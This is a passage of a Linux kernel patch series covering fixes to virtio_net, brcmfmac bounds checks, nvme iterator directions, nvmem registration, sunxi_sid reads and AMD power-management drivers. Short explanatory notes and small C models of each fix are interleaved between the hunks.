+@@ -2154,8 +2154,8 @@ static int virtnet_close(struct net_device *dev)
+ 	cancel_delayed_work_sync(&vi->refill);
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+-		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+ 		napi_disable(&vi->rq[i].napi);
++		xdp_rxq_info_unreg(&vi->rq[i].xdp_rxq);
+ 		virtnet_napi_tx_disable(&vi->sq[i].napi);
+ 	}
+ 
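The virtnet_close() hunk applies ordering in the other direction: quiesce the consumer (napi_disable()) before unregistering the XDP rxq info it reads, so an in-flight poll cannot observe torn-down state. A pthread model of stop-before-free (everything here is an illustrative stand-in; compile with -pthread):

#include <pthread.h>
#include <stdbool.h>

static volatile bool running = true;
static int *shared_resource;

/* The "poll" side: keeps touching the resource while enabled. */
static void *worker(void *arg)
{
	(void)arg;
	while (running)
		(void)*shared_resource;
	return NULL;
}

int main(void)
{
	pthread_t t;
	int resource = 42;

	shared_resource = &resource;
	pthread_create(&t, NULL, worker, NULL);

	running = false;	/* 1. quiesce, like napi_disable() */
	pthread_join(t, NULL);	/* 2. wait for the consumer to stop */
	shared_resource = NULL;	/* 3. only now tear the resource down */
	return 0;
}
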
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index dfcfb33333690..ea8409e0e70e7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -91,6 +91,9 @@
+ #define BRCMF_ASSOC_PARAMS_FIXED_SIZE \
+ 	(sizeof(struct brcmf_assoc_params_le) - sizeof(u16))
+ 
++#define BRCMF_MAX_CHANSPEC_LIST \
++	(BRCMF_DCMD_MEDLEN / sizeof(__le32) - 1)
++
+ static bool check_vif_up(struct brcmf_cfg80211_vif *vif)
+ {
+ 	if (!test_bit(BRCMF_VIF_STATUS_READY, &vif->sme_state)) {
+@@ -6556,6 +6559,13 @@ static int brcmf_construct_chaninfo(struct brcmf_cfg80211_info *cfg,
+ 			band->channels[i].flags = IEEE80211_CHAN_DISABLED;
+ 
+ 	total = le32_to_cpu(list->count);
++	if (total > BRCMF_MAX_CHANSPEC_LIST) {
++		bphy_err(drvr, "Invalid count of channel Spec. (%u)\n",
++			 total);
++		err = -EINVAL;
++		goto fail_pbuf;
++	}
++
+ 	for (i = 0; i < total; i++) {
+ 		ch.chspec = (u16)le32_to_cpu(list->element[i]);
+ 		cfg->d11inf.decchspec(&ch);
+@@ -6701,6 +6711,13 @@ static int brcmf_enable_bw40_2g(struct brcmf_cfg80211_info *cfg)
+ 		band = cfg_to_wiphy(cfg)->bands[NL80211_BAND_2GHZ];
+ 		list = (struct brcmf_chanspec_list *)pbuf;
+ 		num_chan = le32_to_cpu(list->count);
++		if (num_chan > BRCMF_MAX_CHANSPEC_LIST) {
++			bphy_err(drvr, "Invalid count of channel Spec. (%u)\n",
++				 num_chan);
++			kfree(pbuf);
++			return -EINVAL;
++		}
++
+ 		for (i = 0; i < num_chan; i++) {
+ 			ch.chspec = (u16)le32_to_cpu(list->element[i]);
+ 			cfg->d11inf.decchspec(&ch);
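
Both brcmfmac hunks enforce the same defensive rule: a count read back from the firmware must be validated against the buffer it will index before the loop runs, otherwise a malformed response walks past the allocation. A standalone sketch of the check (sizes and names are illustrative):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_ELEMENTS 8

struct fw_list {
	uint32_t count;			/* supplied by the device */
	uint32_t element[MAX_ELEMENTS];
};

static int walk_list(const struct fw_list *list)
{
	/* Never trust a device-reported count: reject before indexing. */
	if (list->count > MAX_ELEMENTS)
		return -EINVAL;

	for (uint32_t i = 0; i < list->count; i++)
		printf("element %u = %u\n", i, list->element[i]);
	return 0;
}

int main(void)
{
	struct fw_list good = { .count = 2, .element = { 7, 9 } };
	struct fw_list evil = { .count = 1u << 30 };

	walk_list(&good);
	return walk_list(&evil) == -EINVAL ? 0 : 1;
}
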
+diff --git a/drivers/net/wwan/t7xx/t7xx_pci.c b/drivers/net/wwan/t7xx/t7xx_pci.c
+index 871f2a27a398a..226fc1703e90f 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pci.c
++++ b/drivers/net/wwan/t7xx/t7xx_pci.c
+@@ -121,6 +121,8 @@ void t7xx_pci_pm_init_late(struct t7xx_pci_dev *t7xx_dev)
+ 	iowrite32(T7XX_L1_BIT(0), IREG_BASE(t7xx_dev) + ENABLE_ASPM_LOWPWR);
+ 	atomic_set(&t7xx_dev->md_pm_state, MTK_PM_RESUMED);
+ 
++	pm_runtime_mark_last_busy(&t7xx_dev->pdev->dev);
++	pm_runtime_allow(&t7xx_dev->pdev->dev);
+ 	pm_runtime_put_noidle(&t7xx_dev->pdev->dev);
+ }
+ 
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index eacd445b5333f..4c052c261517e 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -301,7 +301,7 @@ static inline void nvme_tcp_advance_req(struct nvme_tcp_request *req,
+ 	if (!iov_iter_count(&req->iter) &&
+ 	    req->data_sent < req->data_len) {
+ 		req->curr_bio = req->curr_bio->bi_next;
+-		nvme_tcp_init_iter(req, WRITE);
++		nvme_tcp_init_iter(req, ITER_SOURCE);
+ 	}
+ }
+ 
+@@ -781,7 +781,7 @@ static int nvme_tcp_recv_data(struct nvme_tcp_queue *queue, struct sk_buff *skb,
+ 				nvme_tcp_init_recv_ctx(queue);
+ 				return -EIO;
+ 			}
+-			nvme_tcp_init_iter(req, READ);
++			nvme_tcp_init_iter(req, ITER_DEST);
+ 		}
+ 
+ 		/* we can read only from what is left in this bio */
+diff --git a/drivers/nvme/target/io-cmd-file.c b/drivers/nvme/target/io-cmd-file.c
+index e55ec6fefd7f4..871c4f32f443f 100644
+--- a/drivers/nvme/target/io-cmd-file.c
++++ b/drivers/nvme/target/io-cmd-file.c
+@@ -92,10 +92,10 @@ static ssize_t nvmet_file_submit_bvec(struct nvmet_req *req, loff_t pos,
+ 		if (req->cmd->rw.control & cpu_to_le16(NVME_RW_FUA))
+ 			ki_flags |= IOCB_DSYNC;
+ 		call_iter = req->ns->file->f_op->write_iter;
+-		rw = WRITE;
++		rw = ITER_SOURCE;
+ 	} else {
+ 		call_iter = req->ns->file->f_op->read_iter;
+-		rw = READ;
++		rw = ITER_DEST;
+ 	}
+ 
+ 	iov_iter_bvec(&iter, rw, req->f.bvec, nr_segs, count);
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 6c1476e086ef4..cc05c094de221 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -331,7 +331,7 @@ static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
+ 		sg_offset = 0;
+ 	}
+ 
+-	iov_iter_bvec(&cmd->recv_msg.msg_iter, READ, cmd->iov,
++	iov_iter_bvec(&cmd->recv_msg.msg_iter, ITER_DEST, cmd->iov,
+ 		      nr_pages, cmd->pdu_len);
+ }
+ 
+diff --git a/drivers/nvmem/brcm_nvram.c b/drivers/nvmem/brcm_nvram.c
+index 4441daa209651..7bd65fc2942e2 100644
+--- a/drivers/nvmem/brcm_nvram.c
++++ b/drivers/nvmem/brcm_nvram.c
+@@ -97,6 +97,9 @@ static int brcm_nvram_parse(struct brcm_nvram *priv)
+ 	len = le32_to_cpu(header.len);
+ 
+ 	data = kzalloc(len, GFP_KERNEL);
++	if (!data)
++		return -ENOMEM;
++
+ 	memcpy_fromio(data, priv->base, len);
+ 	data[len - 1] = '\0';
+ 
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index 321d7d63e0683..34ee9d36ee7ba 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
+@@ -770,31 +770,32 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 		return ERR_PTR(rval);
+ 	}
+ 
+-	if (config->wp_gpio)
+-		nvmem->wp_gpio = config->wp_gpio;
+-	else if (!config->ignore_wp)
++	nvmem->id = rval;
++
++	nvmem->dev.type = &nvmem_provider_type;
++	nvmem->dev.bus = &nvmem_bus_type;
++	nvmem->dev.parent = config->dev;
++
++	device_initialize(&nvmem->dev);
++
++	if (!config->ignore_wp)
+ 		nvmem->wp_gpio = gpiod_get_optional(config->dev, "wp",
+ 						    GPIOD_OUT_HIGH);
+ 	if (IS_ERR(nvmem->wp_gpio)) {
+-		ida_free(&nvmem_ida, nvmem->id);
+ 		rval = PTR_ERR(nvmem->wp_gpio);
+-		kfree(nvmem);
+-		return ERR_PTR(rval);
++		nvmem->wp_gpio = NULL;
++		goto err_put_device;
+ 	}
+ 
+ 	kref_init(&nvmem->refcnt);
+ 	INIT_LIST_HEAD(&nvmem->cells);
+ 
+-	nvmem->id = rval;
+ 	nvmem->owner = config->owner;
+ 	if (!nvmem->owner && config->dev->driver)
+ 		nvmem->owner = config->dev->driver->owner;
+ 	nvmem->stride = config->stride ?: 1;
+ 	nvmem->word_size = config->word_size ?: 1;
+ 	nvmem->size = config->size;
+-	nvmem->dev.type = &nvmem_provider_type;
+-	nvmem->dev.bus = &nvmem_bus_type;
+-	nvmem->dev.parent = config->dev;
+ 	nvmem->root_only = config->root_only;
+ 	nvmem->priv = config->priv;
+ 	nvmem->type = config->type;
+@@ -822,11 +823,8 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 		break;
+ 	}
+ 
+-	if (rval) {
+-		ida_free(&nvmem_ida, nvmem->id);
+-		kfree(nvmem);
+-		return ERR_PTR(rval);
+-	}
++	if (rval)
++		goto err_put_device;
+ 
+ 	nvmem->read_only = device_property_present(config->dev, "read-only") ||
+ 			   config->read_only || !nvmem->reg_write;
+@@ -835,28 +833,22 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 	nvmem->dev.groups = nvmem_dev_groups;
+ #endif
+ 
+-	dev_dbg(&nvmem->dev, "Registering nvmem device %s\n", config->name);
+-
+-	rval = device_register(&nvmem->dev);
+-	if (rval)
+-		goto err_put_device;
+-
+ 	if (nvmem->nkeepout) {
+ 		rval = nvmem_validate_keepouts(nvmem);
+ 		if (rval)
+-			goto err_device_del;
++			goto err_put_device;
+ 	}
+ 
+ 	if (config->compat) {
+ 		rval = nvmem_sysfs_setup_compat(nvmem, config);
+ 		if (rval)
+-			goto err_device_del;
++			goto err_put_device;
+ 	}
+ 
+ 	if (config->cells) {
+ 		rval = nvmem_add_cells(nvmem, config->cells, config->ncells);
+ 		if (rval)
+-			goto err_teardown_compat;
++			goto err_remove_cells;
+ 	}
+ 
+ 	rval = nvmem_add_cells_from_table(nvmem);
+@@ -867,17 +859,20 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 	if (rval)
+ 		goto err_remove_cells;
+ 
++	dev_dbg(&nvmem->dev, "Registering nvmem device %s\n", config->name);
++
++	rval = device_add(&nvmem->dev);
++	if (rval)
++		goto err_remove_cells;
++
+ 	blocking_notifier_call_chain(&nvmem_notifier, NVMEM_ADD, nvmem);
+ 
+ 	return nvmem;
+ 
+ err_remove_cells:
+ 	nvmem_device_remove_all_cells(nvmem);
+-err_teardown_compat:
+ 	if (config->compat)
+ 		nvmem_sysfs_remove_compat(nvmem, config);
+-err_device_del:
+-	device_del(&nvmem->dev);
+ err_put_device:
+ 	put_device(&nvmem->dev);
+ 
+@@ -1242,16 +1237,21 @@ struct nvmem_cell *of_nvmem_cell_get(struct device_node *np, const char *id)
+ 	if (!cell_np)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	nvmem_np = of_get_next_parent(cell_np);
+-	if (!nvmem_np)
++	nvmem_np = of_get_parent(cell_np);
++	if (!nvmem_np) {
++		of_node_put(cell_np);
+ 		return ERR_PTR(-EINVAL);
++	}
+ 
+ 	nvmem = __nvmem_device_get(nvmem_np, device_match_of_node);
+ 	of_node_put(nvmem_np);
+-	if (IS_ERR(nvmem))
++	if (IS_ERR(nvmem)) {
++		of_node_put(cell_np);
+ 		return ERR_CAST(nvmem);
++	}
+ 
+ 	cell_entry = nvmem_find_cell_entry_by_node(nvmem, cell_np);
++	of_node_put(cell_np);
+ 	if (!cell_entry) {
+ 		__nvmem_device_put(nvmem);
+ 		return ERR_PTR(-ENOENT);
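
The nvmem rework follows the standard two-step device-model pattern: call device_initialize() early so every later failure can funnel through a single put_device(), whose release callback frees the id and the structure, and call device_add() only once the object is fully populated. A userspace model of that single-unwind shape (refcounting simplified; the corresponding kernel calls are named in comments):

#include <stdio.h>
#include <stdlib.h>

struct obj { int refs; };

static void obj_init(struct obj *o) { o->refs = 1; }	/* device_initialize */
static void obj_put(struct obj *o)			/* put_device */
{
	if (--o->refs == 0) {
		puts("release: free ids, gpios, memory");
		free(o);
	}
}
static int obj_add(struct obj *o) { (void)o; return 0; }	/* device_add */

static struct obj *obj_register(int fail_step)
{
	struct obj *o = malloc(sizeof(*o));

	if (!o)
		return NULL;
	obj_init(o);	/* from here on, every error exits via obj_put() */

	if (fail_step == 1)
		goto err_put;		/* e.g. wp-gpio lookup failed */
	if (fail_step == 2)
		goto err_put;		/* e.g. cell parsing failed */
	if (obj_add(o))			/* publish only when fully set up */
		goto err_put;
	return o;

err_put:
	obj_put(o);	/* single unwind path, as in the nvmem rework */
	return NULL;
}

int main(void)
{
	struct obj *o = obj_register(0);

	if (o)
		obj_put(o);
	return 0;
}
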
+diff --git a/drivers/nvmem/qcom-spmi-sdam.c b/drivers/nvmem/qcom-spmi-sdam.c
+index 4fcb63507ecd1..8499892044b7b 100644
+--- a/drivers/nvmem/qcom-spmi-sdam.c
++++ b/drivers/nvmem/qcom-spmi-sdam.c
+@@ -166,6 +166,7 @@ static const struct of_device_id sdam_match_table[] = {
+ 	{ .compatible = "qcom,spmi-sdam" },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, sdam_match_table);
+ 
+ static struct platform_driver sdam_driver = {
+ 	.driver = {
+diff --git a/drivers/nvmem/sunxi_sid.c b/drivers/nvmem/sunxi_sid.c
+index 5750e1f4bcdbb..92dfe4cb10e38 100644
+--- a/drivers/nvmem/sunxi_sid.c
++++ b/drivers/nvmem/sunxi_sid.c
+@@ -41,8 +41,21 @@ static int sunxi_sid_read(void *context, unsigned int offset,
+ 			  void *val, size_t bytes)
+ {
+ 	struct sunxi_sid *sid = context;
++	u32 word;
++
++	/* .stride = 4 so offset is guaranteed to be aligned */
++	__ioread32_copy(val, sid->base + sid->value_offset + offset, bytes / 4);
+ 
+-	memcpy_fromio(val, sid->base + sid->value_offset + offset, bytes);
++	val += round_down(bytes, 4);
++	offset += round_down(bytes, 4);
++	bytes = bytes % 4;
++
++	if (!bytes)
++		return 0;
++
++	/* Handle any trailing bytes */
++	word = readl_relaxed(sid->base + sid->value_offset + offset);
++	memcpy(val, &word, bytes);
+ 
+ 	return 0;
+ }
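
The sunxi_sid rewrite reads the SID in aligned 32-bit words (byte-wide MMIO reads return corrupt data on some Allwinner SoCs) and finishes a non-multiple-of-4 request by reading one more word and copying only the needed bytes. A standalone model of the word-copy-plus-tail arithmetic, with plain memory standing in for MMIO:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for readl()/__ioread32_copy() over plain memory. */
static uint32_t read_word(const uint8_t *base, size_t off)
{
	uint32_t w;

	memcpy(&w, base + off, sizeof(w));
	return w;
}

static void sid_read(uint8_t *dst, const uint8_t *base,
		     size_t off, size_t bytes)
{
	/* Whole words first; off is assumed word-aligned (.stride = 4). */
	size_t words = bytes / 4;
	size_t tail = bytes % 4;

	for (size_t i = 0; i < words; i++) {
		uint32_t w = read_word(base, off + 4 * i);

		memcpy(dst + 4 * i, &w, 4);
	}

	/* Trailing 1-3 bytes: one more aligned word, partial copy. */
	if (tail) {
		uint32_t w = read_word(base, off + 4 * words);

		memcpy(dst + 4 * words, &w, tail);
	}
}

int main(void)
{
	uint8_t src[8] = { 1, 2, 3, 4, 5, 6, 7, 8 }, dst[6] = { 0 };

	sid_read(dst, src, 0, sizeof(dst));	/* 1 word + 2 tail bytes */
	for (size_t i = 0; i < sizeof(dst); i++)
		printf("%u ", dst[i]);
	putchar('\n');
	return 0;
}
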
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index f08b25195ae79..d1a68b6d03b3f 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -26,7 +26,6 @@
+ #include <linux/serial_core.h>
+ #include <linux/sysfs.h>
+ #include <linux/random.h>
+-#include <linux/kmemleak.h>
+ 
+ #include <asm/setup.h>  /* for COMMAND_LINE_SIZE */
+ #include <asm/page.h>
+@@ -525,12 +524,9 @@ static int __init __reserved_mem_reserve_reg(unsigned long node,
+ 		size = dt_mem_next_cell(dt_root_size_cells, &prop);
+ 
+ 		if (size &&
+-		    early_init_dt_reserve_memory(base, size, nomap) == 0) {
++		    early_init_dt_reserve_memory(base, size, nomap) == 0)
+ 			pr_debug("Reserved memory: reserved region for node '%s': base %pa, size %lu MiB\n",
+ 				uname, &base, (unsigned long)(size / SZ_1M));
+-			if (!nomap)
+-				kmemleak_alloc_phys(base, size, 0);
+-		}
+ 		else
+ 			pr_err("Reserved memory: failed to reserve memory for node '%s': base %pa, size %lu MiB\n",
+ 			       uname, &base, (unsigned long)(size / SZ_1M));
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index adcda7762acf5..816829105135e 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -2296,15 +2296,11 @@ static void qmp_combo_disable_autonomous_mode(struct qmp_phy *qphy)
+ static int __maybe_unused qmp_combo_runtime_suspend(struct device *dev)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+-	struct qmp_phy *qphy = qmp->phys[0];
++	struct qmp_phy *qphy = qmp->usb_phy;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 
+ 	dev_vdbg(dev, "Suspending QMP phy, mode:%d\n", qphy->mode);
+ 
+-	/* Supported only for USB3 PHY and luckily USB3 is the first phy */
+-	if (cfg->type != PHY_TYPE_USB3)
+-		return 0;
+-
+ 	if (!qmp->init_count) {
+ 		dev_vdbg(dev, "PHY not initialized, bailing out\n");
+ 		return 0;
+@@ -2321,16 +2317,12 @@ static int __maybe_unused qmp_combo_runtime_suspend(struct device *dev)
+ static int __maybe_unused qmp_combo_runtime_resume(struct device *dev)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+-	struct qmp_phy *qphy = qmp->phys[0];
++	struct qmp_phy *qphy = qmp->usb_phy;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 	int ret = 0;
+ 
+ 	dev_vdbg(dev, "Resuming QMP phy, mode:%d\n", qphy->mode);
+ 
+-	/* Supported only for USB3 PHY and luckily USB3 is the first phy */
+-	if (cfg->type != PHY_TYPE_USB3)
+-		return 0;
+-
+ 	if (!qmp->init_count) {
+ 		dev_vdbg(dev, "PHY not initialized, bailing out\n");
+ 		return 0;
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index a825af8126c83..2ce8cb2170dfc 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -8,6 +8,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+ 	depends on ACPI && PCI && RTC_CLASS
++	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+ 	  primarily responsible for S2Idle transactions that are driven from
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 8d924986381be..be1b49824edbd 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -22,6 +22,7 @@
+ #include <linux/pci.h>
+ #include <linux/platform_device.h>
+ #include <linux/rtc.h>
++#include <linux/serio.h>
+ #include <linux/suspend.h>
+ #include <linux/seq_file.h>
+ #include <linux/uaccess.h>
+@@ -653,6 +654,33 @@ static int amd_pmc_get_os_hint(struct amd_pmc_dev *dev)
+ 	return -EINVAL;
+ }
+ 
++static int amd_pmc_czn_wa_irq1(struct amd_pmc_dev *pdev)
++{
++	struct device *d;
++	int rc;
++
++	if (!pdev->major) {
++		rc = amd_pmc_get_smu_version(pdev);
++		if (rc)
++			return rc;
++	}
++
++	if (pdev->major > 64 || (pdev->major == 64 && pdev->minor > 65))
++		return 0;
++
++	d = bus_find_device_by_name(&serio_bus, NULL, "serio0");
++	if (!d)
++		return 0;
++	if (device_may_wakeup(d)) {
++		dev_info_once(d, "Disabling IRQ1 wakeup source to avoid platform firmware bug\n");
++		disable_irq_wake(1);
++		device_set_wakeup_enable(d, false);
++	}
++	put_device(d);
++
++	return 0;
++}
++
+ static int amd_pmc_verify_czn_rtc(struct amd_pmc_dev *pdev, u32 *arg)
+ {
+ 	struct rtc_device *rtc_device;
+@@ -782,6 +810,25 @@ static struct acpi_s2idle_dev_ops amd_pmc_s2idle_dev_ops = {
+ 	.check = amd_pmc_s2idle_check,
+ 	.restore = amd_pmc_s2idle_restore,
+ };
++
++static int __maybe_unused amd_pmc_suspend_handler(struct device *dev)
++{
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_CZN) {
++		int rc = amd_pmc_czn_wa_irq1(pdev);
++
++		if (rc) {
++			dev_err(pdev->dev, "failed to adjust keyboard wakeup: %d\n", rc);
++			return rc;
++		}
++	}
++
++	return 0;
++}
++
++static SIMPLE_DEV_PM_OPS(amd_pmc_pm, amd_pmc_suspend_handler, NULL);
++
+ #endif
+ 
+ static const struct pci_device_id pmc_pci_ids[] = {
+@@ -980,6 +1027,9 @@ static struct platform_driver amd_pmc_driver = {
+ 		.name = "amd_pmc",
+ 		.acpi_match_table = amd_pmc_acpi_ids,
+ 		.dev_groups = pmc_groups,
++#ifdef CONFIG_SUSPEND
++		.pm = &amd_pmc_pm,
++#endif
+ 	},
+ 	.probe = amd_pmc_probe,
+ 	.remove = amd_pmc_remove,
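
The amd_pmc quirk is gated on the SMU firmware version with a two-field lexicographic comparison: anything strictly newer than 64.65 is assumed fixed and skips the IRQ1 wakeup workaround. That compare is easy to get wrong when open-coded, so here it is isolated in a compilable sketch:

#include <stdbool.h>
#include <stdio.h>

/* True when (major, minor) is strictly newer than (ref_maj, ref_min). */
static bool fw_newer_than(int major, int minor, int ref_maj, int ref_min)
{
	return major > ref_maj || (major == ref_maj && minor > ref_min);
}

int main(void)
{
	/* Mirrors the amd_pmc gate: the quirk applies only up to 64.65. */
	printf("64.66 fixed: %d\n", fw_newer_than(64, 66, 64, 65)); /* 1 */
	printf("64.65 quirk: %d\n", fw_newer_than(64, 65, 64, 65)); /* 0 */
	printf("65.0  fixed: %d\n", fw_newer_than(65, 0, 64, 65));  /* 1 */
	return 0;
}
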
+diff --git a/drivers/platform/x86/amd/pmf/auto-mode.c b/drivers/platform/x86/amd/pmf/auto-mode.c
+index 644af42e07cf8..96a8e1832c05e 100644
+--- a/drivers/platform/x86/amd/pmf/auto-mode.c
++++ b/drivers/platform/x86/amd/pmf/auto-mode.c
+@@ -275,13 +275,8 @@ int amd_pmf_reset_amt(struct amd_pmf_dev *dev)
+ 	 */
+ 
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
+-		int mode = amd_pmf_get_pprof_modes(dev);
+-
+-		if (mode < 0)
+-			return mode;
+-
+ 		dev_dbg(dev->dev, "resetting AMT thermals\n");
+-		amd_pmf_update_slider(dev, SLIDER_OP_SET, mode, NULL);
++		amd_pmf_set_sps_power_limits(dev);
+ 	}
+ 	return 0;
+ }
+@@ -299,7 +294,5 @@ void amd_pmf_deinit_auto_mode(struct amd_pmf_dev *dev)
+ void amd_pmf_init_auto_mode(struct amd_pmf_dev *dev)
+ {
+ 	amd_pmf_load_defaults_auto_mode(dev);
+-	/* update the thermal limits for Automode */
+-	amd_pmf_set_automode(dev, config_store.current_mode, NULL);
+ 	amd_pmf_init_metrics_table(dev);
+ }
+diff --git a/drivers/platform/x86/amd/pmf/cnqf.c b/drivers/platform/x86/amd/pmf/cnqf.c
+index 668c7c0fea831..f39275ec5cc94 100644
+--- a/drivers/platform/x86/amd/pmf/cnqf.c
++++ b/drivers/platform/x86/amd/pmf/cnqf.c
+@@ -103,7 +103,7 @@ int amd_pmf_trans_cnqf(struct amd_pmf_dev *dev, int socket_power, ktime_t time_l
+ 
+ 	src = amd_pmf_cnqf_get_power_source(dev);
+ 
+-	if (dev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (is_pprof_balanced(dev)) {
+ 		amd_pmf_set_cnqf(dev, src, config_store.current_mode, NULL);
+ 	} else {
+ 		/*
+@@ -307,13 +307,9 @@ static ssize_t cnqf_enable_store(struct device *dev,
+ 				 const char *buf, size_t count)
+ {
+ 	struct amd_pmf_dev *pdev = dev_get_drvdata(dev);
+-	int mode, result, src;
++	int result, src;
+ 	bool input;
+ 
+-	mode = amd_pmf_get_pprof_modes(pdev);
+-	if (mode < 0)
+-		return mode;
+-
+ 	result = kstrtobool(buf, &input);
+ 	if (result)
+ 		return result;
+@@ -321,11 +317,11 @@ static ssize_t cnqf_enable_store(struct device *dev,
+ 	src = amd_pmf_cnqf_get_power_source(pdev);
+ 	pdev->cnqf_enabled = input;
+ 
+-	if (pdev->cnqf_enabled && pdev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (pdev->cnqf_enabled && is_pprof_balanced(pdev)) {
+ 		amd_pmf_set_cnqf(pdev, src, config_store.current_mode, NULL);
+ 	} else {
+ 		if (is_apmf_func_supported(pdev, APMF_FUNC_STATIC_SLIDER_GRANULAR))
+-			amd_pmf_update_slider(pdev, SLIDER_OP_SET, mode, NULL);
++			amd_pmf_set_sps_power_limits(pdev);
+ 	}
+ 
+ 	dev_dbg(pdev->dev, "Received CnQF %s\n", input ? "on" : "off");
+@@ -386,7 +382,7 @@ int amd_pmf_init_cnqf(struct amd_pmf_dev *dev)
+ 	dev->cnqf_enabled = amd_pmf_check_flags(dev);
+ 
+ 	/* update the thermal for CnQF */
+-	if (dev->cnqf_enabled && dev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (dev->cnqf_enabled && is_pprof_balanced(dev)) {
+ 		src = amd_pmf_cnqf_get_power_source(dev);
+ 		amd_pmf_set_cnqf(dev, src, config_store.current_mode, NULL);
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index a5f5a4bcff6d9..da23639071d79 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -58,6 +58,25 @@ static bool force_load;
+ module_param(force_load, bool, 0444);
+ MODULE_PARM_DESC(force_load, "Force load this driver on supported older platforms (experimental)");
+ 
++static int amd_pmf_pwr_src_notify_call(struct notifier_block *nb, unsigned long event, void *data)
++{
++	struct amd_pmf_dev *pmf = container_of(nb, struct amd_pmf_dev, pwr_src_notifier);
++
++	if (event != PSY_EVENT_PROP_CHANGED)
++		return NOTIFY_OK;
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_AUTO_MODE) ||
++	    is_apmf_func_supported(pmf, APMF_FUNC_DYN_SLIDER_DC) ||
++	    is_apmf_func_supported(pmf, APMF_FUNC_DYN_SLIDER_AC)) {
++		if ((pmf->amt_enabled || pmf->cnqf_enabled) && is_pprof_balanced(pmf))
++			return NOTIFY_DONE;
++	}
++
++	amd_pmf_set_sps_power_limits(pmf);
++
++	return NOTIFY_OK;
++}
++
+ static int current_power_limits_show(struct seq_file *seq, void *unused)
+ {
+ 	struct amd_pmf_dev *dev = seq->private;
+@@ -366,14 +385,18 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	if (!dev->regbase)
+ 		return -ENOMEM;
+ 
++	mutex_init(&dev->lock);
++	mutex_init(&dev->update_mutex);
++
+ 	apmf_acpi_init(dev);
+ 	platform_set_drvdata(pdev, dev);
+ 	amd_pmf_init_features(dev);
+ 	apmf_install_handler(dev);
+ 	amd_pmf_dbgfs_register(dev);
+ 
+-	mutex_init(&dev->lock);
+-	mutex_init(&dev->update_mutex);
++	dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
++	power_supply_reg_notifier(&dev->pwr_src_notifier);
++
+ 	dev_info(dev->dev, "registered PMF device successfully\n");
+ 
+ 	return 0;
+@@ -383,11 +406,12 @@ static int amd_pmf_remove(struct platform_device *pdev)
+ {
+ 	struct amd_pmf_dev *dev = platform_get_drvdata(pdev);
+ 
+-	mutex_destroy(&dev->lock);
+-	mutex_destroy(&dev->update_mutex);
++	power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 	amd_pmf_deinit_features(dev);
+ 	apmf_acpi_deinit(dev);
+ 	amd_pmf_dbgfs_unregister(dev);
++	mutex_destroy(&dev->lock);
++	mutex_destroy(&dev->update_mutex);
+ 	kfree(dev->buf);
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/amd/pmf/pmf.h b/drivers/platform/x86/amd/pmf/pmf.h
+index 84bbe2c6ea612..06c30cdc05733 100644
+--- a/drivers/platform/x86/amd/pmf/pmf.h
++++ b/drivers/platform/x86/amd/pmf/pmf.h
+@@ -169,6 +169,7 @@ struct amd_pmf_dev {
